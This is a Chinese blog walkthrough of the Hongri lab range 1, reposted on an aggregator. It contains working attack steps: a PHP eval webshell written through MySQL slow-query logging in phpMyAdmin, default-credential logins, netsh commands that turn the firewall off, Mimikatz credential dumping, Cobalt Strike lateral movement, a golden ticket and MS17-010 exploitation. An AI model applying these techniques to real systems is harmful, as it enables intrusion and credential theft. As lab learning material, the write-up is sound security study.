红日靶场1学习笔记

news2024/11/27 22:32:11

一、准备工作

1、靶场搭建

靶场地址
靶场描述
在这里插入图片描述靶场拓扑图
在这里插入图片描述
其他相关靶场搭建详情见靶场地址相关说明

2、靶场相关主机信息

后续打靶场的过程中,如果不是短时间内完成,可能ip会有变化

主机ip密码角色
win7192.168.122.131hongrisec@2019!边界服务器
win7192.168.52.143hongrisec@2019!边界服务器
win2008192.168.52.138hongrisec@2019#域控
win2003192.168.52.141hongrisec@2019!域成员
kali192.168.122.128攻击机1
win11192.168.122.1攻击机2

3、环境配置启动

启动win7的phpstudy
在这里插入图片描述win 7能通域内其他主机和互联网
在这里插入图片描述
win2008 不能通互联网
在这里插入图片描述

二、web渗透

1、IP及端口的探测

goby、nmap都可以
在这里插入图片描述

2、访问相关端口,可以发现phpinfo页面

在这里插入图片描述

3、进一步进行目录爆破,发现phpmyadmin目录

其他相关文章还写到扫出来了备份文件,对后续文件上传拿到文件路径有帮助,但是我这边没有扫出来,和字典有关
在这里插入图片描述

在这里插入图片描述

4、通过弱口令登录phpmyadmin,弱口令root:root

在这里插入图片描述

5、先修改一下弱口令

如果是攻防赛中可以进行这一步,这里有点多余了
在这里插入图片描述

6、百度大法,发现可以通过数据库写入webshell

phpMyAdmin 渗透利用总结
法一:
直接往web目录下写入webshell
需要的条件:a、有权限写 b、知道web目录绝对路径
查看当前数据库用户是否有写的权限

show variables like '%secure%';

secure-file-priv特性:
secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
当secure_file_priv的值为null ,表示限制mysql 不允许导入|导出
当secure_file_priv的值为/tmp/ ,表示限制mysql 的导入|导出只能发生在/tmp/目录下
当secure_file_priv的值没有具体值时,表示不对mysql 的导入|导出做限制
可以在mysql-ini文件中设置其属性
在这里插入图片描述此处权限为默认NULL,不允许导入导出文件,另寻他法
补充:
如何设置这一属性?
在这里插入图片描述

法二:通过日志文件写入webshell
条件:日志读写权限+web目录的绝对路径
查看当前选项值

show global variables like '%long_query_time%'

在这里插入图片描述开启日志记录功能

set global general_log = "ON";

在这里插入图片描述查看当前日志文件

show variables like 'general%';

在这里插入图片描述
指定日志文件,相关路径phpinfo页面可以看到

set global general_log_file = " C:/phpStudy/WWW/zshell.php";

在这里插入图片描述无法设置日志文件,另寻他法

法三:

尝试通过慢日志写入webshell
慢日志:一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中。

查询当前慢查询日志目录

show variables like '%slow%';

在这里插入图片描述

开启慢查询日志记录功能

set GLOBAL slow_query_log=on;

在这里插入图片描述指定慢查询日志文件
这里就可以成功,为啥上面不能成功?

set GLOBAL slow_query_log_file='C:/phpStudy/WWW/zshell.php';

在这里插入图片描述向慢查询日志中写入phpinfo页面

select "<?php phpinfo();?>" or sleep(11);

在这里插入图片描述查看该日志文件可以成功被解析
在这里插入图片描述进一步写入webshell

set GLOBAL slow_query_log_file='C:/phpStudy/WWW/shell.php';
select "<?php @eval($_POST['cmd']);?>" or sleep(11);

在这里插入图片描述

用蚁剑成功连接webshell
在这里插入图片描述在这里插入图片描述
至此,通过phpmyadmin获取到了web服务器的相关权限

http服务和数据库肯定是为网站服务的
发现数据库中存在newyxcms数据库,搜索相关信息,可以在网上发现源码和相关漏洞
在这里插入图片描述

7、访问相关web页面,进一步挖掘漏洞

前面修改了数据库的密码导致访问报错,又重新修改了密码

http://192.168.122.131/yxcms/
在这里插入图片描述通过公告信息,进入后台(默认弱口令)
在这里插入图片描述
在这里插入图片描述前台模板管理处新建模板文件写入webshell进行漏洞利用
在这里插入图片描述webshell 路径可以在公开源码中查看相关文件获取,也可以通过前面扫出来的网站源码获取,此处的版本和靶机cms的版本不同,但是文件路径一样,最好找相同版本的源码
在这里插入图片描述通过蚁剑连接webshell
![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/55655708ce4748e484611caef6416f8b.png)

留言板存在存储型xss,后台审核可触发
在这里插入图片描述其他文章中还提到了一个sql 注入漏洞,感兴趣的可以自行研究

三、后渗透

主要思路:通过cs生成木马上传到网站服务器进行下一步渗透,如域渗透和横向移动,权限提升和维持

1、通过蚁剑连接后,关闭防火墙

以防对后续测试造成影响,靶场有时候也很玄学

netsh advfirewall show allprofile state                   查看防火墙状态
netsh advfirewall set allprofiles state off 			   关闭防火墙

在这里插入图片描述

2、通过cs生成木马并用蚁剑上传到网站服务器上

在这里插入图片描述在cmd 中运行木马
在这里插入图片描述

3、主机上线后抓取用户名密码,进行内网存活主机端口扫描

抓取主机用户名密码,点击Run Mimikatz
在这里插入图片描述

在这里插入图片描述还可以直接进行提权在这里插入图片描述
在这里插入图片描述主机相关信息收集

net group /domain          域内用户列表

net group "domain computers" /domain    域内计算机列表

net group "domain admins" /domain       域内管理员列表

hostname                                本机名称
net time /domain
查看时间,通过域控获取的时间,可以看到域控的主机名,ping一下可以获取域控的ip

net view
可以看到域里面的用户,ping 一下可以获取相关的ip

内网主机端口扫描
在这里插入图片描述发现存在另外两台主机:192.168.52.138、192.168.52.141
在这里插入图片描述查看域控,发现owa为域控

在这里插入图片描述

四、横向移动

1、搭建代理,进行端口转发

kali上开启frp 服务端
在这里插入图片描述将客户端通过蚁剑上传到win7上,但是一直无法启动
在这里插入图片描述看其他人可以成功,不知道什么问题,上传了这个dll文件也不行

2、通过SMB Beacon达到通内网的目的

网上说这是一个很隐蔽,可以绕过防火墙的好方法,咱也不懂,咱也不敢问
SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信
对同一台主机上的 Beacon 和跨网络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。
参考链接

创建一个新的SMB监听器

在这里插入图片描述
选择138的主机进行横向移动
在这里插入图片描述

138的主机成功上线,同样抓取密码,关闭防火墙
在这里插入图片描述在这里插入图片描述

3、权限维持(黄金票据)

把SID,域名,复制下来等下黄金票据要用


  hash:58e91a5ac358d86513ab224312314061:::

   SID: S-1-5-20

   域名:GOD.ORG

通过黄金票据提权
原理链接
在这里插入图片描述回头再详细研究吧,先照猫画虎

右键->access->golden ticket

在这里插入图片描述

在这里插入图片描述基本上可以通过CS 一把梭了,怪不得说CS是神器

4、cs与msf 联动进行漏洞利用

其实不用cs直接用msf也可以达到目的,不过是各有各的优势,组合起来各取所长
kali端
在这里插入图片描述
cs端
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
获取msf反弹shell,设置代理隧道,使得msf能够通过win7路由转发访问192.168.25.0/24网段

shell     #相当于cmd
chcp 65001    #解决乱码
arp -a    #查看主机arp表信息

在这里插入图片描述
建隧道
在这里插入图片描述在这里插入图片描述在这里插入图片描述进一步利用ms17_010漏洞来探测攻击
在这里插入图片描述同样也发现141主机存在相同漏洞
在这里插入图片描述结束语:写到这里就结束了,一个靶场看起来不大,打起来还是有很多方法和注意的事项。比如说通内网的方法,有用frp的,还有用smb、写路由的,还有提权的各种方法,值得大家探索,毕竟多一种方法多一条路。靶场可以很快打完,但是写文章有时候也是比较麻烦的,不过这也算是一种修行。小小脚本小子,还需多多学习,写的不好的地方大家多多批评指正。还有七个靶场,继续加油!

每日名言:
别问兜里还有多少钱,就问你的青春还都多少年
苦难是生命的防沉迷系统
很多人看不到未来,其实是看到了未来
回忆不过是在时间的长河里刻舟求剑
我最新的照片,其实是我最老的照片

参考文章:
https://blog.csdn.net/qq_41821603/article/details/109948920
https://cloud.tencent.com/developer/article/1595245
https://blog.csdn.net/qq_52849046/article/details/139163010
https://blog.csdn.net/m0_66638011/article/details/139727914?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7Ebaidujs_baidulandingword%7ECtr-1-139727914-blog-136015522.235%5Ev43%5Epc_blog_bottom_relevance_base1&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7Ebaidujs_baidulandingword%7ECtr-1-139727914-blog-136015522.235%5Ev43%5Epc_blog_bottom_relevance_base1&utm_relevant_index=1

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2189759.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

华为OD机试 - 垃圾短信识别(Python/JS/C/C++ 2024 E卷 100分)

华为OD机试 2024E卷题库疯狂收录中&#xff0c;刷题点这里 专栏导读 本专栏收录于《华为OD机试真题&#xff08;Python/JS/C/C&#xff09;》。 刷的越多&#xff0c;抽中的概率越大&#xff0c;私信哪吒&#xff0c;备注华为OD&#xff0c;加入华为OD刷题交流群&#xff0c;…

8645 归并排序(非递归算法)

### 思路 非递归归并排序通过逐步合并相邻的子数组来实现排序。每次合并后输出当前排序结果。 ### 伪代码 1. 读取输入的待排序关键字个数n。 2. 读取n个待排序关键字并存储在数组中。 3. 对数组进行非递归归并排序&#xff1a; - 初始化子数组的大小curr_size为1。 - 逐…

手机使用技巧:8 个 Android 锁屏移除工具 [解锁 Android]

有时候&#xff0c;您会被锁定在自己的 Android 设备之外&#xff0c;而且似乎不可能重新进入。 一个例子就是你买了一部二手手机&#xff0c;后来发现无法使用。另一种情况是你忘记了屏幕锁定密码和用于验证密码的 Google 帐户凭据。这种情况很少见&#xff0c;但确实会发生&…

vite学习教程01、vite构建vue2

文章目录 前言一、vite初始化项目二、修改配置文件2.1、修改main.js文件2.2、修改App.vue文件2.3、修改helloworld.vue2.4、修改vite.conf.js2.5、修改vue版本--修改package.json文件 三、安装vue2和vite插件四、启动服务资料获取 前言 博主介绍&#xff1a;✌目前全网粉丝3W&…

网站建设中,静态网页和动态网页分别是什么,有什么区别

在现代网页设计和开发中&#xff0c;理解静态网页与动态网页的区别是至关重要的。 静态网页 定义&#xff1a; 静态网页是指内容固定不变&#xff0c;用户访问时服务器直接返回存储在服务器上的HTML文件。这些页面通常以.html、.htm等扩展名结尾&#xff0c;不包含特殊符号如“…

多模态大模型调研

Clip的泛化能力超强 压缩图片 GPT4 NLP与CV的区分是历史阶段性的产物&#xff0c;有了vit/transformer之后&#xff0c;两者的区分不再明显 Glip 应用于目标检测

Hadoop之WordCount测试

1、Hadoop简介&#xff1a; Hadoop是Apache旗下的一个用Java语言实现的开源软件框架&#xff0c;是一个开发和运行处理大规模数据的软件平台。 Hadoop的核心组件包括Hadoop分布式文件系统&#xff08;HDFS&#xff09;和MapReduce编程模型。HDFS是一个高度容错的系统&#xf…

CSS3练习--电商web

免责声明&#xff1a;本文仅做分享&#xff01; 目录 小练--小兔鲜儿 目录构建 SEO 三大标签 Favicon 图标 布局网页 版心 快捷导航&#xff08;shortcut&#xff09; 头部&#xff08;header&#xff09; logo 导航 搜索 购物车 底部&#xff08;footer&#xff0…

Vue工程化开发

Vue工程化开发 一、工程化开发和脚手架 1.开发Vue的两种方式 核心包传统开发模式&#xff1a;基于html / css / js 文件&#xff0c;直接引入核心包&#xff0c;开发 Vue。工程化开发模式&#xff1a;基于构建工具&#xff08;例如&#xff1a;webpack&#xff09;的环境中开…

【2024版本】Mac/Windows IDEA安装教程

IDEA 2024版本真的很强大&#xff0c;此外JDK发布了最新稳定版 JDK21 &#xff0c;只有新版本支持JDK 21、JDK22。原来数据库插件不支持redis等一些NoSql的数据库的连接&#xff0c;如果要使用需要自己单独装收费的插件。直接打开idea就很吃内存了&#xff0c;再打开其他一大堆…

计算机毕业设计 网上书店系统的设计与实现 Java实战项目 附源码+文档+视频讲解

博主介绍&#xff1a;✌从事软件开发10年之余&#xff0c;专注于Java技术领域、Python人工智能及数据挖掘、小程序项目开发和Android项目开发等。CSDN、掘金、华为云、InfoQ、阿里云等平台优质作者✌ &#x1f345;文末获取源码联系&#x1f345; &#x1f447;&#x1f3fb; 精…

基于facefusion的换脸

FaceFusion是一个引人注目的开源项目&#xff0c;它专注于利用深度学习技术实现视频或图片中的面部替换。作为下一代换脸器和增强器&#xff0c;FaceFusion在人脸识别和合成技术方面取得了革命性的突破&#xff0c;为用户提供了前所未有的视觉体验。 安装 安装基础软件 安装…

gdb 调试 linux 应用程序的技巧介绍

使用 gdb 来调试 Linux 应用程序时&#xff0c;可以显著提高开发和调试的效率。gdb&#xff08;GNU 调试器&#xff09;是一款功能强大的调试工具&#xff0c;适用于调试各类 C、C 程序。它允许我们在运行程序时检查其状态&#xff0c;设置断点&#xff0c;跟踪变量值的变化&am…

华为OD机试 - 可活动的最大网格点数目 - 广度优先搜索BFS(Python/JS/C/C++ 2024 E卷 200分)

华为OD机试 2024E卷题库疯狂收录中&#xff0c;刷题点这里 专栏导读 本专栏收录于《华为OD机试真题&#xff08;Python/JS/C/C&#xff09;》。 刷的越多&#xff0c;抽中的概率越大&#xff0c;私信哪吒&#xff0c;备注华为OD&#xff0c;加入华为OD刷题交流群&#xff0c;…

【LLM】Agent在智能客服的实践(AI agent、记忆、快捷回复 | ReAct)

note 内容概况&#xff1a;结合京粉app学习agent的实践 Agent架构&#xff1a;通过模型训练提升LLM识别工具的准确性&#xff1b;设计可扩展并安全可控的agent架构扩展业务能力。记忆&#xff1a;多轮对话应用中如何组织、存储和检索记忆来提升大模型对用户的理解。快捷回复&…

【JAVA开源】基于Vue和SpringBoot的水果购物网站

本文项目编号 T 065 &#xff0c;文末自助获取源码 \color{red}{T065&#xff0c;文末自助获取源码} T065&#xff0c;文末自助获取源码 目录 一、系统介绍二、演示录屏三、启动教程四、功能截图五、文案资料5.1 选题背景5.2 国内外研究现状5.3 可行性分析 六、核心代码6.1 查…

生产消费者模式

6. 生产消费者模式 Producer-Consumer模式 6.1 概念 生产者消费者模式就是通过一个容器来解决生产者和消费者的强耦合问题。生产者和消费者彼此之间不直接通讯&#xff0c;而通过阻塞队列来进行通讯&#xff0c;所以生产者生产完数据之后不用等待消费者处理&#xff0c;直接扔…

解决TortoiseGit文件夹图标不见的问题。

打开注册表&#xff0c;\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ &#xff0c;把里面的TortoiseGit开头的前面多补几个空格&#xff0c;让它们排到靠前的位置&#xff0c;然后重启电脑。 据说是windows只有前11/…

在线点餐堂食系统小程序的设计

管理员账户功能包括&#xff1a;系统首页&#xff0c;个人中心&#xff0c;管理员管理&#xff0c;商品管理&#xff0c;基础数据管理&#xff0c;论坛管理&#xff0c;公告信息管理&#xff0c;系统管理 微信端账号功能包括&#xff1a;系统首页&#xff0c;商品&#xff0c;…

AL生成文章标题指定路径保存:创新工具助力内容创作高效启航

在信息爆炸的时代&#xff0c;一个吸引人的标题是文章成功的第一步。它不仅要准确概括文章内容&#xff0c;还要能激发读者的好奇心&#xff0c;促使他们点击阅读。随着人工智能技术的飞速发展&#xff0c;AL生成文章标题功能正逐渐成为内容创作者的新宠&#xff0c;看看它是如…